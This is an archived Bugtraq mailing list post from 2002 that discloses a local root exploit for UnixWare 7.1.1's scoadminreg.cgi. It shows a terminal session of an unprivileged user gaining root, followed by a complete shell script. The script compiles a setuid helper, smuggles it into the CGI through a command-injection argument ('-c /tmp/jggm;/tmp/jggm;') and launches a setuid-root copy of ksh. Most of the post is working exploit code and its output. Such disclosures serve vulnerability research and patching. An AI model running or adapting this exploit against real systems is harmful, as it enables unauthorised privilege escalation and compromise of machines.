Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Unixware 7.1.1 scoadminreg.cgi local exploit

From: jGgM. <jggm () mail com>
Date: 20 Jan 2002 23:30:16 -0000


unixware:~> uname -a
UnixWare unixware 5 7.1.1 i386 x86at SCO 
UNIX_SVR5
unixware:~> id
uid=101(mearee) gid=1(other)
unixware:~> ./scoadminreg.sh 

jGgM root exploit
http://www.netemperor.com/

Mail: jggm () mail com

Manager: -c /tmp/jggm;/tmp/jggm;
ERROR: Cannot find a Webtop object associated 
with -c /tmp/jggm
ERROR: Could not add object  ()
RESULT: Error: Object ".../_ens/Org" already exists.
Location: /webtop/webtops/en_US/admin/scoadminre
gError.html

Success...
# id
uid=101(mearee) gid=1(other) euid=0(root)
# 

It can remote attack...maybe... :))

-----------------------------------------------
Korean Security Forum.
http://www.forsecure.com
http://www.netemperor.com
-----------------------------------------------

Here is file...

--------------------------------------------------------------
#!/bin/sh

CC="gcc"
SCOADMIN=/opt/webtop/bin/i3un0212/cgi-
bin/admin/scoadminreg.cgi

#
#
#
#

echo
echo "jGgM root exploit"
echo "http://www.netemperor.com/";
echo
echo "Mail: jggm () mail com"
echo

if [ ! -x $SCOADMIN ]; then
   echo "$SCOADMIN file not found"
   exit 2;
fi

cat >/tmp/jggm.c <<_EOF

main()
{
   setuid(0);
   setgid(0);
   chown("/tmp/jGgM_Shell", 0, 0);
   chmod("/tmp/jGgM_Shell", 04755);
}
_EOF

cp /bin/ksh /tmp/jGgM_Shell
$CC -o /tmp/jggm /tmp/jggm.c

$SCOADMIN "-c /tmp/jggm;/tmp/jggm;"

rm -rf /tmp/jggm /tmp/jggm.c

/tmp/jGgM_Shell

# end of file..
-----------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: